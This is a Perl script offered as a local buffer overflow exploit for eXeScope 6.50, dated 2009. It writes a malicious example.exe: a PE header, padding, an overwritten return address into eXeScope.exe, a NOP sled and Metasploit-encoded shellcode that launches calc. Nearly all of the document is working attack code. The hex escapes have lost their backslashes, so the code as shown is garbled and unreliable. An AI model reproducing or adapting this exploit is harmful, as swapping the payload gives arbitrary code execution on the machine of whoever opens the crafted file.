#!/usr/bin/perl
#
# eXeScope 6.50 Local Buffer Overflow Exploit
#
# Download eXeScope 6.50 at:
# http://hp.vector.co.jp/authors/VA003525/eXeSc650.zip
#
# Exploit by: Koshi ( heykoshi@gmail.com )
# 

use strict;
use warnings;

my $headers = 
	"x4Dx5Ax90x00x03x00x00x00x04x00x00x00xFFxFFx00x00".
	"xB8x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00".
	"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
	"x00x00x00x00x00x00x00x00x00x00x00x00xB8x00x00x00".
	"x0Ex1FxBAx0Ex00xB4x09xCDx21xB8x01x4CxCDx21x54x68".
	"x69x73x20x70x72x6Fx67x72x61x6Dx20x63x61x6Ex6Ex6F".
	"x74x20x62x65x20x72x75x6Ex20x65x69x74x68x65x72x20".
	"x77x61x79x21x21x0Dx0Dx0Ax24x00x00x00x00x00x00x00".
	"x8Fx8AxF9xDBxCBxEBx97x88xCBxEBx97x88xCBxEBx97x88".
	"x48xF7x99x88xCAxEBx97x88xA2xF4x9Ex88xCAxEBx97x88".
	"x22xF4x9Ax88xCAxEBx97x88x52x69x63x68xCBxEBx97x88".
	"x00x00x00x00x00x00x00x00x50x45x00x00x4Cx01xFFx00".
	"xABxBAx5Cx49x00x00x00x00x00x00x00x00xE0x00xF0x01".
	"x00"x224;


# win32_exec -  EXITFUNC=process CMD=calc Size=161 Encoder=ShikataGaNai http://metasploit.com
my $shellcode =
	"xb8x82x0ax8dx38xd9xc6xd9x74x24xf4x5ax29xc9xb1x23".
	"x31x42x12x83xeaxfcx03xc0x04x6fxcdx38xf0x2bx2exc0".
	"x01x3fx6bxfcx8ax43x71x84x8dx54xf2x3bx96x21x5axe3".
	"xa7xdex2cx68x93xabxaex80xedx6bx29xf0x8axacx3ex0f".
	"x52xe6xb2x0ex96x1cx38x2bx42xc7xc5x3ex8fx8cx99xe4".
	"x4ex78x43x6fx5cx35x07x30x41xc8xfcx45x65x41x03xb2".
	"x1fx09x20x40xe3x83xe8x2cx68xa3xd8x29xaex5cx15xba".
	"x6fx91xaexccx73x04x3bx44x84xbdx35x1fx14xf1x46x1f".
	"x15x79x2ex23x4ax4cx59x3bx22x27x5dx38x0ax4cxcex56".
	"xf5x6bx0cxd5x61x14x2fx93x7cx73x2fx44xe3x1axa3xe9".
	"xe4";

my $buff0 = "A"x4148;
my $eip   = "x58x32x4Dx00"; # 004d3258 - eXeScope.exe
my $sled  = "x90"x20;
my $len   = 6028 - length($shellcode);
my $buff1 = "A"x$len;
my $datas = $headers.$buff0.$eip.$sled.$shellcode.$buff1;

open(my $files, "> example.exe");
binmode $files;
print $files $datas;
close($files);

# www.Syue.com [2009-03-23]